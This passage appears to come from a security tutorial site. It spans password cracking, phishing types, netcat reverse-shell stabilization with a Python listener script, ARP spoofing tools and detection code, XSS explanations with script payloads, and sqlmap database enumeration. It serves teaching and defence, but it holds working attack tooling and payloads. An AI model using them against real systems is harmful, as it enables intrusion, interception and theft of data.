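    return sum(charset_size ** k for k in range(1, max_len + 1))


def hours_to_exhaust(charset_size: int, max_len: int, guesses_per_second: float) -> float:
    """Worst-case time for the brute force at a given cracking rate."""
    return keyspace(charset_size, max_len) / guesses_per_second / 3600


# Constructed rules and wordlist; rockyou.txt has about 14 million lines.
RULES = (lambda w: w, lambda w: w.capitalize(), lambda w: w + "2020", lambda w: w + "!")
SAMPLE_WORDLIST = ["password", "summer", "winter", "welcome"]

if __name__ == "__main__":
    print("brute force 'ab' over 'abc':", brute_force(sha256_hex("ab"), "abc", 2))
    print("dictionary 'summer2020':", dictionary_attack(sha256_hex("summer2020"), SAMPLE_WORDLIST, RULES))
    print("8 lowercase chars, 1e9 guesses/s:", round(hours_to_exhaust(26, 8, 1e9), 1), "hours")
    print("8 chars from 95 printable, 1e9 guesses/s:", round(hours_to_exhaust(95, 8, 1e9) / 24 / 365, 1), "years")
```

Seven guesses against a dictionary with rules versus billions for an exhaustive search is the whole argument for dictionary attacks; the brute-force numbers are also why password policies care about length and character classes, and why a slow hash (bcrypt, Argon2) matters far more than an unsalted SHA-256.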


    Phishing v/s Vishing v/s SMShing


    PHISHING

According to Wikipedia, phishing is the fraudulent attempt to obtain sensitive information or data, such as usernames, passwords and credit card details, by impersonating a trustworthy entity in digital communication.

In a nutshell, phishing is an attack that tries to trick the victim into clicking a link, entering credentials or executing malware. It is typically carried out by sending fake emails or instant messages that point to a fake website made to look legitimate, where the victim is asked to enter credentials. It is a form of social engineering.

SMiShing

  • SMS phishing uses text messages to deliver the bait that tricks victims into divulging their personal information.
  • Smishing messages typically invite the user to click a link, call a phone number or contact an email address provided by the attacker.
  • The victim is then asked to provide sensitive information. URLs are often shortened or only partially displayed in mobile messaging apps and browsers, which makes it harder to tell a genuine web page from a fake one.
  • As mobile phone use has grown over the past few years, a malicious link sent via SMS can yield the same result as one sent via email.

VISHING

  • Vishing is phishing over a voice call.
  • Not every attack needs a fake login website.
  • Text messages claiming to be from a bank tell users to dial a number if they want to resolve an issue with their account or get a discount on their credit card.
  • When the number is dialed, an automated system asks the user to enter their account number and PIN.
  • The attacker may also spoof caller-ID data so that the call appears to come from a legitimate number; caller-ID apps such as Truecaller only display what the network reports and can be fooled the same way, so they are not a reliable defence.
If you encounter a number or email address involved in these activities, please report it through our contact-us form.



    Stabilize Shell in netcat

netcat is a computer networking utility for reading from and writing to network connections using TCP or UDP. We can use netcat to receive a reverse shell from a remote machine, or to connect to a bind shell on it.

A reverse shell is a shell session established over a connection that is initiated by the remote (target) machine back to the attacker's listener, not by the attacker.

A bind shell is a shell in which the target machine opens a listening port and waits for an incoming connection from the attacker.

Netcat is a very good tool to receive connections and enumerate further, but the shell it gives you is not attached to a terminal: there is no tab completion or command history, interactive programs such as su, ssh or text editors misbehave, and pressing Ctrl+C kills the whole session instead of the running command. To get a proper terminal and stabilize the connection, follow the steps below:

  • Receive (or open) the remote shell.
  nc -lvnp <PORT> to listen for a reverse shell, or nc <IP> <PORT> to connect to a bind shell
  • Spawn a pseudo-terminal on the remote side (use python3 if only Python 3 is installed).
  python -c "import pty; pty.spawn('/bin/bash')"
  • Background your raw shell.
  C-z (Ctrl + Z)
  • Set the local terminal to raw mode, so that keystrokes such as Ctrl+C are passed through to the remote side instead of being interpreted locally.
  stty raw -echo
  • Foreground your remote shell.

  fg

  • Finally, in the remote shell, set the terminal type (export TERM=xterm) and the terminal size with stty rows and cols to match what your local terminal reports, so that full-screen programs render correctly.

This will give you a full terminal that will not exit on C-c.

Doing these steps for every reverse shell gets repetitive after a while, and there is a real danger of losing the shell by accidentally pressing C-c before raw mode is set.

Pwncat fixes the problem by sending the same commands to the target automatically as soon as a connection comes in.

More about pwncat in our separate post.
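As an added example, not pwncat's code and not part of the original post, the following Python listener does the same steps automatically: it accepts the reverse shell, pushes the pty, TERM and stty commands into it, and puts the local terminal into raw mode while relaying bytes in both directions. It assumes python3 is present on the target and a Linux or macOS attacker box (termios).

```python
"""Minimal pwncat-style reverse-shell listener that performs the manual upgrade
steps automatically (worked example; not netcat's, pwncat's or the page's code)."""
import os
import select
import shutil
import socket
import sys
import termios
import tty


def stabilize_commands(rows: int, cols: int, shell: str = "/bin/bash") -> str:
    """Commands pushed into the raw remote shell right after it connects.
    Assumes python3 exists on the target. bash reads a non-terminal stdin line by
    line, so the lines after pty.spawn are consumed by the new pty-backed shell."""
    return (
        f"python3 -c 'import pty; pty.spawn(\"{shell}\")'\n"
        "export TERM=xterm\n"
        f"stty rows {rows} cols {cols}\n"
    )


def relay(conn: socket.socket) -> None:
    """Put the local terminal in raw mode (the local `stty raw -echo`) and copy bytes
    both ways, so Ctrl+C, Ctrl+Z and arrow keys reach the remote pty."""
    cols, rows = shutil.get_terminal_size()
    conn.sendall(stabilize_commands(rows, cols).encode())
    stdin = sys.stdin.fileno()
    saved = termios.tcgetattr(stdin)
    tty.setraw(stdin)
    try:
        while True:
            readable, _, _ = select.select([conn, stdin], [], [])
            if conn in readable:
                data = conn.recv(4096)
                if not data:
                    break                    # remote shell exited
                os.write(sys.stdout.fileno(), data)
            if stdin in readable:
                data = os.read(stdin, 4096)
                if not data:
                    break
                conn.sendall(data)
    finally:
        termios.tcsetattr(stdin, termios.TCSADRAIN, saved)   # always restore the terminal


def listen(port: int) -> None:
    """Equivalent of `nc -lvnp <port>` followed by the stabilization steps."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind(("0.0.0.0", port))
        srv.listen(1)
        print(f"listening on 0.0.0.0:{port}")
        conn, peer = srv.accept()
        with conn:
            print(f"connection from {peer[0]}:{peer[1]}, upgrading to a pty")
            relay(conn)


if __name__ == "__main__":
    listen(int(sys.argv[1]) if len(sys.argv) > 1 else 4444)
```

Run it in place of nc -lvnp and trigger the reverse shell as usual; because raw mode is only entered after the connection exists and the terminal settings are restored in a finally block, a stray Ctrl+C can no longer kill the session or leave your terminal unusable.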




    Detect ARP Attacks via XArp Tool



XArp is a security application that uses a number of active and passive detection modules to spot ARP-based attacks, i.e. attackers inside your local network segment. With ARP spoofing an attacker can silently eavesdrop on or manipulate all traffic between you and the gateway (or any other host on the same LAN), because ARP has no authentication: any host can claim any IP address, and most operating systems simply accept the last answer they heard.
**NOTE - XArp is only available for Windows and Ubuntu.
  • Download the XArp tool from the official website.
  • Install the tool.
    • Windows: run the installer.
    • Ubuntu: in a terminal, change to the download directory and run dpkg -i <File_Name>.
  • When the system is not under attack, XArp shows every IP with a single, stable MAC address and no alerts.
  • When the system is under attack, XArp raises an alert, typically because an IP (often the gateway) suddenly maps to a different MAC, or because one MAC is answering for several IPs.
Independently of any tool, you can check for the same symptoms with arp -a (two IPs sharing one MAC, or the gateway's MAC changing) and reduce the risk with static ARP entries for the gateway or Dynamic ARP Inspection on managed switches.

**NOTE - Our own tools for scanning and spoofing ARP are described further down this page.




    Network Scanner v1.0



Network Scanner is a free open-source tool that can be used to scan the whole internal network for live hosts.

The source code is written in Python and can be reused. The tool is licensed under the GNU General Public License v3.0; make sure you read the license before using its source code.

Network Scanner supports Linux/Debian platforms only.

How to use:

  • Make setup.sh executable.
    • chmod 755 setup.sh
  • Run setup.sh
    • ./setup.sh
  • Run the Python script with root privileges (raw ARP sockets require root).
    • sudo python3 network_scanner.py

Available Arguments:

  • -h or --help: Displays all the available options.
  • -i or --interface: Defines the interface on which to scan the network. Example: sudo python3 network_scanner.py -i <interface_name>
  • -r or --range: Defines the network address and subnet mask to scan, e.g. 192.168.0.1/24, 10.0.0.0/8 or 172.16.0.0/12. Command: sudo python3 network_scanner.py -i <interface_name> -r <range/mask>

**NOTE -
  • You need to be connected to the network you want to scan, because the program works by sending ARP requests, which do not cross routers.
  • Check the video at the bottom for a full tutorial on how to use it.

Color Significance:

  • Green: Successful.
  • Yellow: In process.
  • System Color: Result.
  • Red: Unsuccessful or errors.

To download the tool:

  • In a terminal type git clone https://github.com/hackhunt/network-scanner/


    ARP Spoofer v1.0



ARP Spoofer is a free open-source tool that can be used to perform a man-in-the-middle attack on a local network: it sends forged ARP replies so that the target associates the router's IP with the attacker's MAC address (and the router associates the target's IP with it too), and traffic between them then flows through the attacker's machine.

The source code is written in Python and can be reused. The tool is licensed under the GNU General Public License v3.0; make sure you read the license before using its source code.

ARP Spoofer supports Linux/Debian platforms only.

It is easier to use than arpspoof (the tool built into Kali Linux).

How to use:

  • Make setup.sh executable.
    • chmod 755 setup.sh
  • Run setup.sh
    • ./setup.sh
  • Run the Python script with root privileges.
    • sudo python3 arp_spoofer.py

Available Arguments:

  • -h or --help: Displays all the available options.
  • -i or --interface: Required. Defines the interface on which to send the spoofed replies.
  • -r or --router: Required. Defines the router's IP address.
  • -t or --target: Required. Defines the target's IP address.
**Note:
  • You need to be connected to the same network as the target and the router, because ARP only works within one broadcast domain.
  • For the target's traffic to keep flowing while you intercept it, IP forwarding must be enabled on your machine; otherwise the target simply loses connectivity, which is also how such an attack gets noticed.
  • Check the video at the bottom for a full tutorial on how to use it.

Color Significance:

  • Green: Successful.
  • Yellow: In process.
  • System Color: Result.
  • Red: Unsuccessful or errors.

To download the tool:

  • In a terminal type git clone https://github.com/hackhunt/arp-spoofer/
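The three tools on this page (XArp detecting, Network Scanner sending ARP requests, ARP Spoofer sending forged replies) all deal with the same 42-byte frame. The following added example, written for this page and not taken from XArp or from the hackhunt repositories, builds those frames offline and runs passive detection logic over them; the MAC and IP addresses are made up, and nothing is sent on the wire (that would need an AF_PACKET raw socket and root).

```python
"""ARP frames built and inspected offline (worked example). build_arp() with op=1 is the
broadcast request a scanner sends, op=2 the reply a spoofer sends; ArpWatch is the
passive detection logic. Not XArp's code nor the Network Scanner / ARP Spoofer source."""
import struct

ETH_P_ARP = 0x0806
BROADCAST = "ff:ff:ff:ff:ff:ff"
ZERO_MAC = "00:00:00:00:00:00"


def mac_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", ""))


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def ip_bytes(ip: str) -> bytes:
    return bytes(int(octet) for octet in ip.split("."))


def ip_str(raw: bytes) -> str:
    return ".".join(str(b) for b in raw)


def build_arp(op: int, sender_mac: str, sender_ip: str, target_mac: str, target_ip: str) -> bytes:
    """Ethernet II header + ARP packet (14 + 28 = 42 bytes). op=1 request, op=2 reply."""
    dst = BROADCAST if op == 1 else target_mac
    eth = mac_bytes(dst) + mac_bytes(sender_mac) + struct.pack("!H", ETH_P_ARP)
    arp = (struct.pack("!HHBBH", 1, 0x0800, 6, 4, op)      # Ethernet, IPv4, 6-byte MAC, 4-byte IP
           + mac_bytes(sender_mac) + ip_bytes(sender_ip)
           + mac_bytes(target_mac) + ip_bytes(target_ip))
    return eth + arp


def parse_arp(frame: bytes):
    """Return the ARP fields of an Ethernet frame, or None if it is not IPv4-over-Ethernet ARP."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        return None
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return {"op": op,
            "sender_mac": mac_str(frame[22:28]), "sender_ip": ip_str(frame[28:32]),
            "target_mac": mac_str(frame[32:38]), "target_ip": ip_str(frame[38:42])}


class ArpWatch:
    """Passive detector in the spirit of XArp's passive modules: learns IP->MAC from
    replies, remembers outstanding requests, and flags the classic spoofing symptoms.
    Feed it every frame captured on the interface; feed() returns the new alerts."""

    def __init__(self):
        self.table = {}        # ip -> mac, as learned from replies
        self.pending = set()   # (ip being asked about, ip of the asker)
        self.alerts = []

    def feed(self, frame: bytes):
        pkt = parse_arp(frame)
        if pkt is None:
            return []
        if pkt["op"] == 1:
            self.pending.add((pkt["target_ip"], pkt["sender_ip"]))
            return []
        ip, mac = pkt["sender_ip"], pkt["sender_mac"]
        new = []
        key = (ip, pkt["target_ip"])
        if key in self.pending:
            self.pending.discard(key)
        else:   # nobody asked: gratuitous ARP (sometimes legitimate) or a poisoning attempt
            new.append(("unsolicited-reply", f"{mac} announced {ip} without a request"))
        old = self.table.get(ip)
        if old is not None and old != mac:
            new.append(("mac-changed", f"{ip} moved from {old} to {mac}"))
        self.table[ip] = mac
        claimed = sorted(i for i, m in self.table.items() if m == mac)
        if len(claimed) > 1:   # one NIC answering for the gateway and a host is the spoofer's signature
            new.append(("mac-claims-multiple-ips", f"{mac} answers for {', '.join(claimed)}"))
        self.alerts.extend(new)
        return new


if __name__ == "__main__":
    watch = ArpWatch()
    watch.feed(build_arp(1, "aa:aa:aa:aa:aa:10", "192.168.1.10", ZERO_MAC, "192.168.1.1"))
    watch.feed(build_arp(2, "00:11:22:33:44:01", "192.168.1.1", "aa:aa:aa:aa:aa:10", "192.168.1.10"))
    poison = build_arp(2, "de:ad:be:ef:00:01", "192.168.1.1", "aa:aa:aa:aa:aa:10", "192.168.1.10")
    for kind, detail in watch.feed(poison):
        print(kind, "-", detail)
```

A single unsolicited reply is weak evidence on its own (DHCP clients and failover setups send gratuitous ARP), which is why the detector reports kinds separately; an unsolicited reply that also changes the gateway's MAC and comes from a NIC already known under another IP is the combination worth paging someone for.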


      Concept of XSS

      Cross-site scripting is also known as XSS where X stands for CROSS and SS stands for SITE SCRIPTING (just our assumption). It is an injection-based attack where the attacker submits a malicious code that is accepted by the server and has the ability to harm the company’s infrastructure or leak the PII (Personal identification information) of their users.


      XSS is the most common type of vulnerability. It is always placed in OWASP's top 10. Using the popular and modern frameworks while developing the website might reduce the risk of cross-site scripting but it won't eradicate the risk completely. So, XSS will always be there no matter what.


      XSS can be found in the places where the user input is required; in the Web application like username, address, and profile field or even in an image file name uploaded to the server.

      TYPES OF XSS:

      There are mainly three types of XSS:
      • Reflected XSS
      • Stored XSS
      • DOM XSS

      Reflected XSS

      Reflected XSS arises when the malicious code supplies by the attacker are immediately shown in the response of the site. An attacker could only exploit the Reflected XSS by tricking the user into opening the vulnerable page in a website and then the attacker can gain the session cookies, impersonate the user and gain full access over their account, which can also virtually deface the website.

      Reflected XSS arises when user input is not sanitized properly by the server before it is returned in the response and executed.

      For Example:

      There is an online shopping portal that has a search function; the URL for the search term KNOWLEDGE will be
      https://vulnerable-website.com/search?term=knowledge

      and when the attacker submits JavaScript code instead of the item he is looking for, the URL will look like
      https://vulnerable-website.com/search?term=<script>alert(1)</script>

      Reflected XSS Example
      Here, the browser treats the code injected by the attacker as legitimate script coming from the site and executes it, which results in a pop-up alert box.

      An attacker can only exploit this vulnerability by tricking the user into opening the link. This can be done by placing the unsafe link on an attacker-controlled website or sending it through messages or emails.
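The reflection described above, as an added example that is not code from the original post: a minimal search-page renderer in the vulnerable form and with HTML output encoding applied to the same term. The function names and the shape of the page are our assumptions.

```javascript
// Added example, not from the original post. Function names are assumptions.

// Encode the characters that let text break out of an HTML text node or a
// double-quoted attribute value. This is the fix for reflected XSS in this
// context: the term is still displayed, but it can no longer become markup.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Pull the `term` query parameter out of a search URL, as the server would.
// searchParams.get() returns the decoded value, so percent-encoded input
// such as %3Cscript%3E comes back as <script>.
function termFromUrl(url) {
  return new URL(url).searchParams.get("term") ?? "";
}

// Vulnerable: the term is concatenated straight into the response body, so
// ?term=<script>alert(1)</script> reaches the browser as a real script tag.
function renderSearchVulnerable(term) {
  return `<h1>Results for: ${term}</h1>`;
}

// Fixed: the same page, but the term is encoded before it enters the HTML.
function renderSearchSafe(term) {
  return `<h1>Results for: ${escapeHtml(term)}</h1>`;
}

// Self-check a code reviewer can run: feed the post's own example URL through
// a renderer and report whether a script tag survives in the output.
function reflectsRawTag(render, url) {
  const html = render(termFromUrl(url));
  return /<\/?script/i.test(html);
}
```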

      Ways to find reflected XSS:
      • Find every parameter on the website.
      • Try injecting simple payloads like <script>alert(1)</script>.
      • Watch the response carefully. If the website accepts the code and you see a pop-up, congrats, you have found an XSS. If it doesn't fire, ask yourself what is stopping it: is it a firewall or the sanitization? Use BurpSuite to check and play around.
      • If the website doesn't allow some characters like “, >, <, /, or tags like <script>, try their alternatives or try encoding them; who knows, the developer might allow encoded input to be processed.
      • Try different payloads and learn which characters are allowed and which are blocked. This will give you a lot of insight into how the web application works.

      STORED XSS

      As you might have guessed from the name, stored XSS is a type of XSS where the malicious code supplied by the attacker is stored on the server and executes whenever a user visits the page. It is also referred to as persistent XSS.

      Generally, this type of XSS is found in the comments or posts section of a website, where user input is stored on the server. Sometimes the payload can even be stored in a username or a profile display name, and it fires for whoever visits that user's profile.

      Blind cross-site scripting is a form of persistent XSS. It occurs when the attacker's payload is saved on the server and reflected back to a victim from a backend application. For example, in a feedback form an attacker can submit the malicious payload, and once a backend user or admin opens the submitted form in the backend application, the payload executes. Blind XSS is hard to confirm in real-world scenarios; one of the best tools for this is XSS Hunter.

      DOM-Based XSS

      This type of XSS occurs when user-controlled data (typically part of the URL) enters the page's JavaScript through a source and is then passed to a sink that renders or executes it.

      This is one of the hardest types of XSS to find.

      If the web application's JavaScript reads a value from any of the sources listed below and passes it into one of the sinks, we can inject our own JavaScript code through that value.

      Sources:
      • document.URL
      • document.referrer
      • location
      • location.href
      • location.search
      • location.hash
      • location.pathname

      Sinks:
      • element.innerHTML
      • element.outerHTML
      • setInterval()
      • eval()
      • setTimeout()
      • document.write()
      • document.writeln()

      If the data we supplied flows from one of these sources into one of these sinks, we will have our XSS pop-up.

      Let's see an example.
      DOM Based Example
      Here we can see that there is a source, location.href, whose fragment (the part after #) is read into a variable. If we can inject our payload into that fragment, it reaches the third line, divElement.innerHTML = source; // sink, and our XSS pops up.
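The source-to-sink flow described above, as an added example that is not code from the original post: the fragment of the URL is the source, divElement.innerHTML is the sink, and the fixed version writes the same data to textContent instead. Because this runs in Node rather than a browser, a plain object stands in for the div; that stand-in and the function names are our assumptions.

```javascript
// Added example, not from the original post. The stand-in element and the
// function names are assumptions; in a browser the element would come from
// document.getElementById() or similar.

// Stand-in for a DOM element. A real div parses whatever is assigned to
// innerHTML as markup and treats textContent as literal text; here we only
// record which of the two sinks the data reached.
function makeDiv() {
  return { innerHTML: "", textContent: "" };
}

// Source: the fragment of location.href (the same value location.hash holds),
// i.e. the "#" and everything after it. Browsers percent-encode < and > in
// the fragment, which is why the page script has to decode it before use.
function fragmentOf(href) {
  const idx = href.indexOf("#");
  return idx === -1 ? "" : href.slice(idx);
}

// Vulnerable: the decoded fragment flows straight into innerHTML, so a URL
// ending in #%3Cscript%3Ealert(1)%3C/script%3E (the post's own payload,
// percent-encoded) is handed to the browser as markup.
function renderFragmentVulnerable(href, divElement) {
  const source = decodeURIComponent(fragmentOf(href).slice(1)); // source
  divElement.innerHTML = source;                                  // sink
  return divElement;
}

// Fixed: same source, same element, but textContent is not an HTML sink.
// The browser displays the characters literally and never parses them.
function renderFragmentSafe(href, divElement) {
  const source = decodeURIComponent(fragmentOf(href).slice(1));
  divElement.textContent = source;
  return divElement;
}

// Review aid: would this string be parsed as markup by an innerHTML sink?
function containsMarkup(text) {
  return /<[a-z!/]/i.test(text);
}
```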

      POLYGLOT: The King Payload

      An XSS polyglot is a single payload that combines several different injection techniques. These are generally crafted by bug hunters with a lot of experience.

      These polyglots are used to break out of the HTML and to get past the blacklists and whitelists that are in place to prevent alert boxes from popping.

      Some examples of XSS polyglots are:





      Intercept Request using BurpSuite to use in SQLMap


      SQLMap is an open-source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. BurpSuite is a web application security testing suite with an intercepting proxy and an automated vulnerability scanner.

      USING REQUEST TO FIND SQLI

      • Intercept the POST request using BurpSuite.
      • If the request is not a POST (for example, a GET request), right-click > Change request method. The method will be changed to POST.
      • Once you have intercepted the POST request, save it to a file: right-click > Copy to file, then choose a name and location for the file.
      • Fire up the terminal and pass the file to SQLMap using the -r switch.
        • Syntax: sqlmap -r <file_location>
      sqlmap -r post_req_file -p “name” --dbs --threads 5
      • The switches used in the above example are:
        • -r: request file
        • -p: parameter(s) to test
        • --dbs: enumerate databases
        • --threads: number of threads to run
